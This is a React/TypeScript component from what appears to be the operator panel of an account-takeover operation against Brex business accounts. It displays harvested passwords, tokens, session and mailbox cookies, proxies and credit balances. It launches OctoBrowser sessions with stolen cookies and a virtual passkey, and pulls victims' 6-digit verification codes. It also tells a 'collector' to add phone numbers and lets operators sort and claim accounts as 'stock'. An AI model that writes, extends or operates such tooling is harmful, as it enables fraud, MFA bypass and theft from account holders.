import { useEffect, useState } from "react";
import { createPortal } from "react-dom";
import {
  ApiError,
  api,
  type AppEvent,
  type BrexAlert,
  type ProcessedAccount,
  type PullAccount,
  collectorPhaseView,
  isActiveOperatorAlert,
  smsAddColumnLabel,
} from "../api";
import { isProcessedAccount, isPullAccount } from "../api";
import { useAuth } from "../auth/AuthContext";
import { isElectronDesktop, mutateClearOperatorAlert, mutateNotes, mutatePhoneAdd, mutateStock } from "../desktop";
import { ConfirmModal } from "./ConfirmModal";
import { useToast } from "./Toast";

type StatusConfirm =
  | "stash"
  | "ready"
  | "bad"
  | "pending"
  | "sendPending"
  | "listUsed"
  | "enrich"
  | "clearAlert"
  | "phoneYes"
  | "phoneNo";

interface EventDetailModalProps {
  event: AppEvent;
  onClose: () => void;
  /** Show Move to Ready / Mark Bad stock actions */
  stockMode?: boolean;
  /** Non Stash page — offer Send to Pending */
  nonStashMode?: boolean;
  onStockMoved?: (event: AppEvent) => void;
  onSendToPending?: () => void;
  /** Enrichment Fail page — show full error + mark processed */
  enrichFailMode?: boolean;
  enrichFailReviewed?: boolean;
  enrichFailBusy?: boolean;
  onMarkEnrichFailReviewed?: (reviewed: boolean) => void;
  /** Employee/Medium pages — mark inventory used/fresh */
  listUsedMode?: boolean;
  onListUsedToggled?: (event: AppEvent) => void;
}

type TakeStep = null | "confirm" | "conflict" | "force-confirm";

/**
 * Assignees never see credentials/proxy/cookies here (server also redacts).
 * Flip to true later to restore the full detail sections for low-priv users.
 */
const SHOW_USER_SENSITIVE_DETAIL = false;

function money(n: number | null | undefined): string {
  if (n === undefined || n === null || Number.isNaN(n)) return "N/A";
  return n.toLocaleString(undefined, { style: "currency", currency: "USD" });
}

function cookiesForDisplay(raw: string | undefined): string {
  const text = String(raw || "").trim();
  if (!text) return "";
  if (text.startsWith("[") || text.startsWith("{")) {
    try {
      const parsed = JSON.parse(text) as unknown;
      const list = Array.isArray(parsed)
        ? parsed
        : parsed &&
            typeof parsed === "object" &&
            Array.isArray((parsed as { cookies?: unknown }).cookies)
          ? (parsed as { cookies: unknown[] }).cookies
          : null;
      if (list) return JSON.stringify(list, null, 2);
      return JSON.stringify(parsed, null, 2);
    } catch {
      return text;
    }
  }
  return text;
}

function proxyLabel(proxy: PullAccount["proxy"]): string {
  if (!proxy) return "—";
  if (typeof proxy === "string") return proxy;
  const user = proxy.username ?? "";
  const pass = proxy.password ?? "";
  const auth = user || pass ? `${user}:${pass}@` : "";
  return `${proxy.protocol}://${auth}${proxy.host}:${proxy.port}`;
}

export function EventDetailModal({
  event,
  onClose,
  stockMode,
  nonStashMode,
  onStockMoved,
  onSendToPending,
  enrichFailMode,
  enrichFailReviewed,
  enrichFailBusy,
  onMarkEnrichFailReviewed,
  listUsedMode,
  onListUsedToggled,
}: EventDetailModalProps) {
  const { push } = useToast();
  const { user } = useAuth();
  const isAdmin = user?.role === "admin";
  const showSensitive = isAdmin || SHOW_USER_SENSITIVE_DETAIL;
  const [octoBusy, setOctoBusy] = useState(false);
  const [takeStep, setTakeStep] = useState<TakeStep>(null);
  const [takeBusy, setTakeBusy] = useState(false);
  const [conflictName, setConflictName] = useState<string | null>(null);
  const [notesDraft, setNotesDraft] = useState(event.adminNotes || "");
  const [notesBusy, setNotesBusy] = useState(false);
  const [stockBusy, setStockBusy] = useState(false);
  const [alertBusy, setAlertBusy] = useState(false);
  const [statusConfirm, setStatusConfirm] = useState<StatusConfirm | null>(null);
  const desktop = isElectronDesktop();
  const [alertClock, setAlertClock] = useState(() => Date.now());

  useEffect(() => {
    setNotesDraft(event.adminNotes || "");
  }, [event.id, event.adminNotes]);

  useEffect(() => {
    const id = window.setInterval(() => setAlertClock(Date.now()), 15_000);
    return () => window.clearInterval(id);
  }, []);

  const processed = isProcessedAccount(event.payload) ? event.payload : null;
  const pull: PullAccount | null = processed
    ? processed.original
    : isPullAccount(event.payload)
      ? event.payload
      : null;

  const enrichmentError =
    pull?.enrichmentError ||
    (event.payload &&
    typeof event.payload === "object" &&
    "enrichmentError" in event.payload
      ? (event.payload as { enrichmentError?: PullAccount["enrichmentError"] })
          .enrichmentError
      : undefined);

  const canTakeSelf = event.status === "ready" && isAdmin;
  const canPullAlerts = isAdmin || event.assignedUserId === user?.id;
  const stage = event.stockStage || "none";
  const channel = event.stockChannel || "none";
  const showStockActions = Boolean(
    stockMode && isAdmin && stage !== "none" && stage !== "non_stash"
  );
  const canSendToStash = Boolean(
    isAdmin && (stage === "none" || stage === "non_stash")
  );

  async function openInOcto() {
    if (!window.brexDesktop || !pull) return;
    setOctoBusy(true);
    try {
      const result = await window.brexDesktop.openInOcto({
        title: pull.email || pull.id,
        cookies: pull.cookies,
        proxy: pull.proxy,
        token: pull.token,
        brexTokens: pull.brexTokens,
        hasToken: Boolean(pull.token?.trim() || pull.brexTokens?.accessToken),
        enablePasskey: true,
        passkeyId: pull.email || pull.id,
        startUrl:
          pull.token?.trim() || pull.brexTokens?.accessToken
            ? "https://dashboard.brex.com/"
            : "https://accounts.brex.com/",
      });
      if (result.ok) {
        const data = result.data as { passkeyAttached?: boolean; passkeyWarning?: string };
        if (data?.passkeyWarning) {
          push(`Opened Octo (passkey warn: ${data.passkeyWarning})`, "info");
        } else if (data?.passkeyAttached) {
          push("Opened temporary OctoBrowser profile (virtual passkey)", "ok");
        } else {
          push("Opened temporary OctoBrowser profile", "ok");
        }
      } else {
        push(result.error, "error");
      }
    } catch (err) {
      push(err instanceof Error ? err.message : "OctoBrowser failed", "error");
    } finally {
      setOctoBusy(false);
    }
  }

  async function submitPhoneAdd(action: "yes" | "no") {
    setAlertBusy(true);
    try {
      const updated = await mutatePhoneAdd(
        event.id,
        action,
        pull?.visitorId || event.resourceKey || pull?.email
      );
      push(action === "yes" ? "Yes — collector will add a phone number" : "No — collector will skip phone add", "ok");
      onStockMoved?.(updated);
    } catch (err) {
      push(err instanceof Error ? err.message : "Failed to send phone-add choice", "error");
    } finally {
      setAlertBusy(false);
    }
  }

  async function clearOperatorAlert() {
    setAlertBusy(true);
    try {
      const updated = await mutateClearOperatorAlert(
        event.id,
        pull?.visitorId || event.resourceKey || pull?.email
      );
      push("Cleared operator alert", "ok");
      onStockMoved?.(updated);
    } catch (err) {
      push(err instanceof Error ? err.message : "Failed to clear operator alert", "error");
    } finally {
      setAlertBusy(false);
    }
  }

  async function sendToStash() {
    setStockBusy(true);
    try {
      const updated = await mutateStock(event.id, {
        stage: "pending",
        channel: channel === "passkey" ? "passkey" : "admin_user",
      });
      push("Sent to Stash → Available Stock (Pending)", "ok");
      onStockMoved?.(updated);
    } catch (err) {
      push(err instanceof Error ? err.message : "Failed to send to stash", "error");
    } finally {
      setStockBusy(false);
    }
  }

  async function moveStock(nextStage: "ready" | "bad" | "pending") {
    setStockBusy(true);
    try {
      const keepChannel =
        channel === "passkey" || channel === "admin_user" ? channel : "admin_user";
      const updated = await mutateStock(event.id, {
        stage: nextStage,
        channel: keepChannel,
      });
      push(
        nextStage === "ready"
          ? "Moved to Ready stock"
          : nextStage === "bad"
            ? "Marked bad"
            : "Moved to Pending",
        "ok"
      );
      onStockMoved?.(updated);
    } catch (err) {
      push(err instanceof Error ? err.message : "Stock update failed", "error");
    } finally {
      setStockBusy(false);
    }
  }

  async function submitTakeSelf(force: boolean) {
    setTakeBusy(true);
    try {
      const data = await api<{ event: AppEvent }>(`/api/data/events/${event.id}/take-self`, {
        method: "POST",
        body: JSON.stringify({ force }),
      });
      if (data.event && window.brexDesktop?.applyServerEvent) {
        void window.brexDesktop.applyServerEvent(data.event);
      }
      push(force ? "Force-reassigned to you" : "Taken — assigned to you", "ok");
      setTakeStep(null);
      setConflictName(null);
    } catch (err) {
      if (err instanceof ApiError && err.status === 409) {
        const data = err.data as {
          assignedUsername?: string | null;
          message?: string;
        };
        setConflictName(data.assignedUsername || null);
        setTakeStep("conflict");
        return;
      }
      if (err instanceof ApiError && err.status === 403) {
        push(err.message || "Not allowed to force-reassign", "error");
        setTakeStep(null);
        return;
      }
      push(err instanceof Error ? err.message : "Take failed", "error");
    } finally {
      setTakeBusy(false);
    }
  }

  async function runStatusConfirm() {
    const kind = statusConfirm;
    if (!kind) return;
    try {
      if (kind === "stash") await sendToStash();
      else if (kind === "ready") await moveStock("ready");
      else if (kind === "bad") await moveStock("bad");
      else if (kind === "pending") await moveStock("pending");
      else if (kind === "sendPending") onSendToPending?.();
      else if (kind === "listUsed") onListUsedToggled?.(event);
      else if (kind === "enrich") onMarkEnrichFailReviewed?.(!enrichFailReviewed);
      else if (kind === "clearAlert") await clearOperatorAlert();
      else if (kind === "phoneYes") await submitPhoneAdd("yes");
      else if (kind === "phoneNo") await submitPhoneAdd("no");
      setStatusConfirm(null);
    } catch {
      /* handlers already toast */
    }
  }

  const statusConfirmCopy = (() => {
    const label = pull?.email || event.externalId;
    switch (statusConfirm) {
      case "stash":
        return {
          title: "Send to Stash?",
          body: (
            <p>
              Send <strong>{label}</strong> to Stash → Available Stock (Pending)?
            </p>
          ),
          confirmLabel: "Send to Stash",
          danger: false,
        };
      case "ready":
        return {
          title: "Move to Ready?",
          body: (
            <p>
              Move <strong>{label}</strong> to Ready stock?
            </p>
          ),
          confirmLabel: "Move to Ready",
          danger: false,
        };
      case "bad":
        return {
          title: "Mark bad?",
          body: (
            <p>
              Mark <strong>{label}</strong> as bad stock?
            </p>
          ),
          confirmLabel: "Mark bad",
          danger: true,
        };
      case "pending":
        return {
          title: "Back to Pending?",
          body: (
            <p>
              Move <strong>{label}</strong> back to Pending?
            </p>
          ),
          confirmLabel: "Back to Pending",
          danger: false,
        };
      case "sendPending":
        return {
          title: "Send to Pending?",
          body: (
            <p>
              Send <strong>{label}</strong> to Available Stock → Pending?
            </p>
          ),
          confirmLabel: "Send to Pending",
          danger: false,
        };
      case "listUsed":
        return {
          title: event.listUsed ? "Mark fresh?" : "Mark used?",
          body: event.listUsed ? (
            <p>
              Move <strong>{label}</strong> back to Fresh?
            </p>
          ) : (
            <p>
              Mark <strong>{label}</strong> used? It will leave Fresh and show under Used.
            </p>
          ),
          confirmLabel: event.listUsed ? "Mark fresh" : "Mark used",
          danger: false,
        };
      case "enrich":
        return {
          title: enrichFailReviewed ? "Move back to New?" : "Mark processed?",
          body: enrichFailReviewed ? (
            <p>
              Move <strong>{label}</strong> back to New enrichment failures?
            </p>
          ) : (
            <p>
              Mark <strong>{label}</strong> processed? It will leave the New tab.
            </p>
          ),
          confirmLabel: enrichFailReviewed ? "Move back to New" : "Mark processed",
          danger: false,
        };
      case "clearAlert":
        return {
          title: "Clear operator alert?",
          body: (
            <p>
              Clear the operator alert on <strong>{label}</strong>?
            </p>
          ),
          confirmLabel: "Clear alert",
          danger: false,
        };
      case "phoneYes":
        return {
          title: "Add a phone number?",
          body: (
            <p>
              Tell the collector to add a phone number on <strong>{label}</strong>?
              The Octo window stays open until you close it.
            </p>
          ),
          confirmLabel: "Yes, add phone",
          danger: false,
        };
      case "phoneNo":
        return {
          title: "Skip phone update?",
          body: (
            <p>
              Tell the collector not to add a phone number on <strong>{label}</strong>?
              The Octo window will close.
            </p>
          ),
          confirmLabel: "No, skip",
          danger: true,
        };
      default:
        return null;
    }
  })();

  const statusConfirmBusy =
    stockBusy || alertBusy || Boolean(enrichFailBusy) || takeBusy;

  async function saveNotes() {
    setNotesBusy(true);
    try {
      await mutateNotes(event.id, notesDraft);
      push("Notes saved", "ok");
    } catch (err) {
      push(err instanceof Error ? err.message : "Failed to save notes", "error");
    } finally {
      setNotesBusy(false);
    }
  }

  return (
    <div className="modal-backdrop" onClick={onClose} role="presentation">
      <div
        className="modal-panel surface"
        role="dialog"
        aria-modal="true"
        aria-labelledby="event-detail-title"
        onClick={(e) => e.stopPropagation()}
      >
        <header className="modal-head">
          <div>
            <p className="brand">Account detail</p>
            <h2 id="event-detail-title">{pull?.email || event.externalId}</h2>
          </div>
          <div className="modal-head-actions">
            {canSendToStash && (
              <button
                type="button"
                className="btn soft compact"
                disabled={stockBusy}
                title="Put this login in Stash → Available Stock (Pending)"
                onClick={() => setStatusConfirm("stash")}
              >
                {stockBusy ? "Sending…" : "Send to Stash"}
              </button>
            )}
            {showStockActions && stage !== "ready" && (
              <button
                type="button"
                className="btn soft compact"
                disabled={stockBusy}
                onClick={() => setStatusConfirm("ready")}
              >
                Move to Ready
              </button>
            )}
            {showStockActions && stage !== "bad" && (
              <button
                type="button"
                className="btn ghost compact"
                disabled={stockBusy}
                onClick={() => setStatusConfirm("bad")}
              >
                Mark Bad
              </button>
            )}
            {showStockActions && stage === "bad" && (
              <button
                type="button"
                className="btn soft compact"
                disabled={stockBusy}
                onClick={() => setStatusConfirm("pending")}
              >
                Back to Pending
              </button>
            )}
            {nonStashMode && onSendToPending && (
              <button
                type="button"
                className="btn soft compact"
                onClick={() => setStatusConfirm("sendPending")}
              >
                Send to Pending
              </button>
            )}
            {canTakeSelf && (
              <button
                type="button"
                className="btn soft compact"
                disabled={takeBusy}
                onClick={() => setTakeStep("confirm")}
              >
                Mark take-self
              </button>
            )}
            {enrichFailMode && onMarkEnrichFailReviewed && (
              <button
                type="button"
                className="btn soft compact"
                disabled={enrichFailBusy}
                onClick={() => setStatusConfirm("enrich")}
              >
                {enrichFailBusy
                  ? "Saving…"
                  : enrichFailReviewed
                    ? "Move back to New"
                    : "Mark processed"}
              </button>
            )}
            {listUsedMode && isAdmin && (
              <button
                type="button"
                className="btn soft compact"
                onClick={() => setStatusConfirm("listUsed")}
              >
                {event.listUsed ? "Mark fresh" : "Mark used"}
              </button>
            )}
            {desktop && showSensitive && (
              <button
                type="button"
                className="btn soft compact"
                disabled={octoBusy || (!pull?.proxy && !pull?.cookies)}
                title={
                  !pull?.proxy && !pull?.cookies
                    ? "No proxy/cookies on this account"
                    : "Start temporary Octo profile"
                }
                onClick={() => void openInOcto()}
              >
                {octoBusy ? "Opening…" : "Open in OctoBrowser"}
              </button>
            )}
            <button type="button" className="btn ghost compact" onClick={onClose}>
              Close
            </button>
          </div>
        </header>

        <div className="modal-body">
          {alertClock > 0 && isActiveOperatorAlert(pull?.operatorAlert) && pull?.operatorAlert && (
            <div className="banner urgent">
              <div className="banner-head">
                <p className="shell-urgent-title">Operator needed</p>
                {pull.operatorAlert.type !== "phone_add_choice" && (
                  <button
                    type="button"
                    className="btn ghost compact"
                    disabled={alertBusy}
                    onClick={() => setStatusConfirm("clearAlert")}
                  >
                    {alertBusy ? "Clearing…" : "Clear alert"}
                  </button>
                )}
              </div>
              <p>{pull.operatorAlert.message}</p>
              {pull.operatorAlert.type === "phone_add_choice" && (
                <div className="confirm-actions" style={{ marginTop: 12 }}>
                  <button
                    type="button"
                    className="btn"
                    disabled={alertBusy}
                    onClick={() => setStatusConfirm("phoneYes")}
                  >
                    Yes, add phone
                  </button>
                  <button
                    type="button"
                    className="btn danger"
                    disabled={alertBusy}
                    onClick={() => setStatusConfirm("phoneNo")}
                  >
                    No
                  </button>
                </div>
              )}
              <p className="muted tiny">
                {pull.operatorAlert.type === "phone_add_choice"
                  ? "This prompt expires in 5 minutes. Yes keeps Octo open until you close it. No (or no answer) closes the browser."
                  : "Collector Octo stays open for 5 minutes. If nobody answers, it closes."}
                {pull.mailCookies
                  ? " Mailbox cookies are in this row — copy them if you need another browser."
                  : ""}
              </p>
            </div>
          )}
          <section className="detail-grid">
            <Detail label="Email" value={pull?.email || "—"} />
            <Detail label="Collector phase" value={collectorPhaseView(event, pull).label} />
            <Detail
              label="Collector"
              value={pull?.collectorStatus || "—"}
            />
            <Detail label="SMS add" value={smsAddColumnLabel(pull)} />
            {pull?.fsprosStatus ? <Detail label="fspros" value={pull.fsprosStatus} /> : null}
            {pull?.phone ? <Detail label="Phone" value={pull.phone} copy /> : null}
            {showSensitive && (
              <>
                <Detail label="ID" value={pull?.id || event.externalId} mono />
                <Detail
                  label="Type"
                  value={
                    processed?.type === "admin"
                      ? "Admin"
                      : processed?.type === "medium"
                        ? "Medium"
                        : processed?.type === "employee"
                          ? "Employee"
                          : processed?.type || "—"
                  }
                />
                <Detail
                  label="Tags"
                  value={
                    processed?.tags && processed.tags.length
                      ? processed.tags.join(", ")
                      : "—"
                  }
                />
                <Detail label="Balance" value={money(processed?.balance)} />
                <Detail label="Credit available" value={money(processed?.credit)} />
                <Detail label="Credit limit" value={money(processed?.creditLimit)} />
                <Detail label="Assigned to" value={event.assignedUsername || "Unassigned"} />
                <Detail label="Status" value={event.status} />
                {(stage !== "none" || stockMode || nonStashMode || canSendToStash) && (
                  <>
                    <Detail
                      label="Stock"
                      value={`${stage}${channel !== "none" ? ` / ${channel}` : ""}`}
                    />
                  </>
                )}
                {event.status === "failed" && (
                  <div className="detail-field" style={{ gridColumn: "1 / -1" }}>
                    <span className="muted tiny">Enrichment error</span>
                    <p className="detail-value enrich-fail-msg">
                      {enrichmentError?.note || event.processNote || "Enrichment failed"}
                    </p>
                    {enrichmentError?.responsePath && (
                      <p className="muted tiny" style={{ marginTop: "0.35rem" }}>
                        Saved path: {enrichmentError.responsePath}
                      </p>
                    )}
                    {(enrichmentError?.response !== undefined ||
                      event.processNote) && (
                      <pre className="enrich-fail-response">
                        {enrichmentError?.response !== undefined
                          ? typeof enrichmentError.response === "string"
                            ? enrichmentError.response
                            : JSON.stringify(enrichmentError.response, null, 2)
                          : event.processNote}
                      </pre>
                    )}
                  </div>
                )}
                <Detail
                  label="Processed"
                  value={
                    event.processedAt
                      ? new Date(event.processedAt).toLocaleString()
                      : "—"
                  }
                />
                <Detail label="Proxy" value={proxyLabel(pull?.proxy)} mono copy />
              </>
            )}
          </section>

          <section className="detail-block">
            <h3>Notes</h3>
            {isAdmin ? (
              <div className="notes-editor">
                <textarea
                  className="notes-textarea"
                  rows={4}
                  value={notesDraft}
                  onChange={(e) => setNotesDraft(e.target.value)}
                  placeholder="Add notes for the assignee…"
                  maxLength={4000}
                />
                <div className="notes-actions">
                  <button
                    type="button"
                    className="btn soft compact"
                    disabled={notesBusy || notesDraft === (event.adminNotes || "")}
                    onClick={() => void saveNotes()}
                  >
                    {notesBusy ? "Saving…" : "Save notes"}
                  </button>
                </div>
              </div>
            ) : event.adminNotes?.trim() ? (
              <p className="notes-readonly">{event.adminNotes}</p>
            ) : (
              <p className="muted">No notes yet.</p>
            )}
          </section>

          {canPullAlerts && <AlertsPane eventId={event.id} />}

          {showSensitive && (
            <>
              <section className="detail-block">
                <h3>Credentials</h3>
                <Detail label="Password" value={pull?.password || "—"} mono copy />
                <Detail label="Token" value={pull?.token || "—"} mono copy />
                <div className="detail-field">
                  <span className="muted tiny">Cookies</span>
                  <pre className="detail-pre">{cookiesForDisplay(pull?.cookies) || "—"}</pre>
                  {pull?.cookies ? (
                    <button
                      type="button"
                      className="btn ghost compact"
                      onClick={() => {
                        const text = cookiesForDisplay(pull.cookies);
                        void navigator.clipboard.writeText(text).then(
                          () => push("Copied cookies", "ok"),
                          () => push("Copy failed", "error")
                        );
                      }}
                    >
                      Copy cookies
                    </button>
                  ) : null}
                </div>
                {pull?.mailCookies ? (
                  <div className="detail-field">
                    <span className="muted tiny">Mailbox cookies (M365 / Gmail)</span>
                    <pre className="detail-pre">{cookiesForDisplay(pull.mailCookies)}</pre>
                    <button
                      type="button"
                      className="btn ghost compact"
                      onClick={() => {
                        const text = cookiesForDisplay(pull.mailCookies);
                        void navigator.clipboard.writeText(text).then(
                          () => push("Copied mailbox cookies", "ok"),
                          () => push("Copy failed", "error")
                        );
                      }}
                    >
                      Copy mailbox cookies
                    </button>
                  </div>
                ) : null}
              </section>

              <section className="detail-block">
                <h3>Activity</h3>
                {pull?.events && pull.events.length > 0 ? (
                  <div className="event-timeline">
                    {[...pull.events].reverse().map((ev, i) => (
                      <div key={`${ev.ts}-${ev.type}-${i}`} className="event-timeline-row">
                        <div className="event-timeline-time">
                          {ev.ts ? new Date(ev.ts).toLocaleString() : "—"}
                        </div>
                        <div className="event-timeline-body">
                          <span className="event-timeline-type">{ev.type || "info"}</span>
                          <span className="event-timeline-msg">{ev.message || ""}</span>
                        </div>
                      </div>
                    ))}
                  </div>
                ) : (
                  <p className="muted">No harvest timeline events yet.</p>
                )}
              </section>

              <section className="detail-block">
                <h3>Details</h3>
                {processed?.details && processed.details.length > 0 ? (
                  <pre className="detail-pre">
                    {JSON.stringify(processed.details, null, 2)}
                  </pre>
                ) : (
                  <p className="muted">No details yet.</p>
                )}
              </section>

              <section className="detail-block">
                <h3>Raw payload</h3>
                <pre className="detail-pre">{JSON.stringify(event.payload, null, 2)}</pre>
              </section>
            </>
          )}
        </div>
      </div>

      {statusConfirm && statusConfirmCopy && (
        <ConfirmModal
          title={statusConfirmCopy.title}
          body={statusConfirmCopy.body}
          confirmLabel={statusConfirmCopy.confirmLabel}
          danger={statusConfirmCopy.danger}
          busy={statusConfirmBusy}
          onCancel={() => !statusConfirmBusy && setStatusConfirm(null)}
          onConfirm={() => void runStatusConfirm()}
        />
      )}

      {takeStep &&
        createPortal(
          <TakeSelfModals
            step={takeStep}
            busy={takeBusy}
            label={pull?.email || event.externalId}
            conflictName={conflictName}
            onCancel={() => {
              if (takeBusy) return;
              setTakeStep(null);
              setConflictName(null);
            }}
            onConfirmTake={() => void submitTakeSelf(false)}
            onChooseForce={() => setTakeStep("force-confirm")}
            onConfirmForce={() => void submitTakeSelf(true)}
          />,
          document.body
        )}
    </div>
  );
}

function AlertsPane({ eventId }: { eventId: number }) {
  const { push } = useToast();
  const [busy, setBusy] = useState(false);
  const [cooldownUntil, setCooldownUntil] = useState(0);
  const [tick, setTick] = useState(0);
  const [alerts, setAlerts] = useState<BrexAlert[] | null>(null);
  const [meta, setMeta] = useState<{
    totalFetched: number;
    totalMatched: number;
    fetchedAt: string;
  } | null>(null);

  useEffect(() => {
    if (cooldownUntil <= Date.now()) return;
    const id = window.setInterval(() => setTick((t) => t + 1), 250);
    return () => window.clearInterval(id);
  }, [cooldownUntil]);

  const remainingMs = Math.max(0, cooldownUntil - Date.now());
  const cooldownSec = Math.ceil(remainingMs / 1000);
  void tick;

  async function pullAlerts() {
    if (busy || remainingMs > 0) return;
    setBusy(true);
    try {
      const data = await api<{
        alerts: BrexAlert[];
        totalFetched: number;
        totalMatched: number;
        fetchedAt: string;
      }>(`/api/data/events/${eventId}/alerts`, { method: "POST" });
      setAlerts(data.alerts);
      setMeta({
        totalFetched: data.totalFetched,
        totalMatched: data.totalMatched,
        fetchedAt: data.fetchedAt,
      });
      setCooldownUntil(Date.now() + 5_000);
      push(
        data.totalMatched
          ? `Found ${data.totalMatched} verification alert${data.totalMatched === 1 ? "" : "s"}`
          : "No verification codes in recent alerts",
        "ok"
      );
    } catch (err) {
      if (err instanceof ApiError && err.status === 429) {
        const data = err.data as { retryAfterMs?: number; message?: string };
        const wait = Math.max(1_000, Number(data.retryAfterMs) || 5_000);
        setCooldownUntil(Date.now() + wait);
        push(data.message || "Wait a few seconds before pulling again", "error");
      } else {
        push(err instanceof Error ? err.message : "Alerts pull failed", "error");
      }
    } finally {
      setBusy(false);
    }
  }

  return (
    <section className="detail-block alerts-pane">
      <div className="alerts-pane-head">
        <h3>Notifications</h3>
        <button
          type="button"
          className="btn soft compact"
          disabled={busy || remainingMs > 0}
          onClick={() => void pullAlerts()}
        >
          {busy
            ? "Pulling…"
            : remainingMs > 0
              ? `Wait ${cooldownSec}s`
              : "Pull notifications"}
        </button>
      </div>
      <p className="muted tiny alerts-hint">
        Shows 6-digit codes from GetAlertsQuery the collector browser already
        loaded. Limited to once every 5 seconds.
      </p>
      {meta && (
        <p className="muted tiny">
          Last pull {new Date(meta.fetchedAt).toLocaleString()} — {meta.totalMatched} of{" "}
          {meta.totalFetched} matched
        </p>
      )}
      {alerts === null ? (
        <p className="muted">Pull to load verification codes.</p>
      ) : alerts.length === 0 ? (
        <p className="muted">No matching alerts.</p>
      ) : (
        <ul className="alerts-list">
          {alerts.map((a) => (
            <li key={a.id} className="alert-card">
              <div className="alert-card-top">
                <strong className="alert-title">{a.title || "Alert"}</strong>
                {a.createdAt && (
                  <time className="muted tiny">
                    {new Date(a.createdAt).toLocaleString()}
                  </time>
                )}
              </div>
              <p className="alert-body">{a.body}</p>
              {a.primaryCta?.link && (
                <a
                  className="alert-cta muted tiny"
                  href={a.primaryCta.link}
                  target="_blank"
                  rel="noreferrer"
                >
                  {a.primaryCta.text || "Open link"}
                </a>
              )}
            </li>
          ))}
        </ul>
      )}
    </section>
  );
}

function TakeSelfModals({
  step,
  busy,
  label,
  conflictName,
  onCancel,
  onConfirmTake,
  onChooseForce,
  onConfirmForce,
}: {
  step: Exclude<TakeStep, null>;
  busy: boolean;
  label: string;
  conflictName: string | null;
  onCancel: () => void;
  onConfirmTake: () => void;
  onChooseForce: () => void;
  onConfirmForce: () => void;
}) {
  useEffect(() => {
    const onKey = (e: KeyboardEvent) => {
      if (e.key === "Escape" && !busy) onCancel();
    };
    window.addEventListener("keydown", onKey);
    return () => window.removeEventListener("keydown", onKey);
  }, [busy, onCancel]);

  if (step === "confirm") {
    return (
      <div className="modal-backdrop take-backdrop" role="presentation" onClick={onCancel}>
        <div
          className="modal-panel confirm-panel surface"
          role="dialog"
          aria-modal="true"
          aria-labelledby="take-confirm-title"
          onClick={(e) => e.stopPropagation()}
        >
          <header className="modal-head">
            <div>
              <p className="brand">Take account</p>
              <h2 id="take-confirm-title">Mark take-self?</h2>
            </div>
          </header>
          <div className="modal-body confirm-body">
            <p>
              Assign <strong>{label}</strong> to yourself?
            </p>
            <p className="muted tiny">
              If someone else claims it first, you’ll get a chance to force-reassign.
            </p>
            <div className="confirm-actions">
              <button type="button" className="btn ghost" disabled={busy} onClick={onCancel}>
                Cancel
              </button>
              <button type="button" className="btn soft" disabled={busy} onClick={onConfirmTake}>
                {busy ? "Taking…" : "Confirm take-self"}
              </button>
            </div>
          </div>
        </div>
      </div>
    );
  }

  if (step === "conflict") {
    return (
      <div className="modal-backdrop take-backdrop" role="presentation" onClick={onCancel}>
        <div
          className="modal-panel confirm-panel surface conflict-panel"
          role="dialog"
          aria-modal="true"
          aria-labelledby="take-conflict-title"
          onClick={(e) => e.stopPropagation()}
        >
          <header className="modal-head">
            <div>
              <p className="brand warn-brand">Already taken</p>
              <h2 id="take-conflict-title">This account has already been taken</h2>
            </div>
          </header>
          <div className="modal-body confirm-body">
            <p>
              {conflictName ? (
                <>
                  Currently assigned to <strong>{conflictName}</strong>. Confirm force-reassign?
                </>
              ) : (
                <>Someone else claimed it first. Confirm force-reassign?</>
              )}
            </p>
            <p className="muted tiny">Force-reassign will move the account to you.</p>
            <div className="confirm-actions">
              <button type="button" className="btn ghost" disabled={busy} onClick={onCancel}>
                Cancel
              </button>
              <button type="button" className="btn danger" disabled={busy} onClick={onChooseForce}>
                Force-reassign
              </button>
            </div>
          </div>
        </div>
      </div>
    );
  }

  return (
    <div className="modal-backdrop take-backdrop" role="presentation" onClick={onCancel}>
      <div
        className="modal-panel confirm-panel surface conflict-panel"
        role="dialog"
        aria-modal="true"
        aria-labelledby="take-force-title"
        onClick={(e) => e.stopPropagation()}
      >
        <header className="modal-head">
          <div>
            <p className="brand warn-brand">Force-reassign</p>
            <h2 id="take-force-title">Are you sure?</h2>
          </div>
        </header>
        <div className="modal-body confirm-body">
          <p>
            Force-reassign <strong>{label}</strong>
            {conflictName ? (
              <>
                {" "}
                from <strong>{conflictName}</strong>
              </>
            ) : null}{" "}
            to yourself?
          </p>
          <p className="muted tiny">This cannot be undone from here — they will lose the assignment.</p>
          <div className="confirm-actions">
            <button type="button" className="btn ghost" disabled={busy} onClick={onCancel}>
              Cancel
            </button>
            <button type="button" className="btn danger" disabled={busy} onClick={onConfirmForce}>
              {busy ? "Reassigning…" : "Yes, force-reassign"}
            </button>
          </div>
        </div>
      </div>
    </div>
  );
}

function Detail({
  label,
  value,
  mono,
  copy,
}: {
  label: string;
  value: string;
  mono?: boolean;
  copy?: boolean;
}) {
  return (
    <div className="detail-field">
      <span className="muted tiny">{label}</span>
      <div className="detail-value-row">
        <p className={mono ? "mono detail-value" : "detail-value"}>{value}</p>
        {copy && value !== "—" && (
          <button
            type="button"
            className="btn soft compact detail-copy"
            onClick={() => void navigator.clipboard.writeText(value)}
          >
            Copy
          </button>
        )}
      </div>
    </div>
  );
}

function moneyOrNA(n: number | null | undefined): string {
  if (n === null || n === undefined) return "N/A";
  return n.toLocaleString(undefined, { style: "currency", currency: "USD" });
}

export function summaryFromEvent(event: AppEvent): {
  id: string;
  email: string;
  type: string;
  tags: string[];
  balance: string;
  credit: string;
  creditLimit: string;
} {
  const processed: ProcessedAccount | null = isProcessedAccount(event.payload)
    ? event.payload
    : null;
  const pull = processed?.original || (isPullAccount(event.payload) ? event.payload : null);
  const progress =
    !processed &&
    (event.eventType === "account.progress" ||
      pull?.progressUpdate ||
      pull?.type === "progress");
  return {
    id: pull?.id || event.externalId,
    email: pull?.email || (progress && pull?.visitorId ? "Visitor" : "—"),
    type: processed?.type
      ? processed.type
      : progress
        ? "progress"
        : event.status === "processing"
          ? "processing…"
          : "—",
    tags: processed?.tags || [],
    balance: processed ? moneyOrNA(processed.balance) : "—",
    credit: processed ? moneyOrNA(processed.credit) : "—",
    creditLimit: processed ? moneyOrNA(processed.creditLimit) : "—",
  };
}
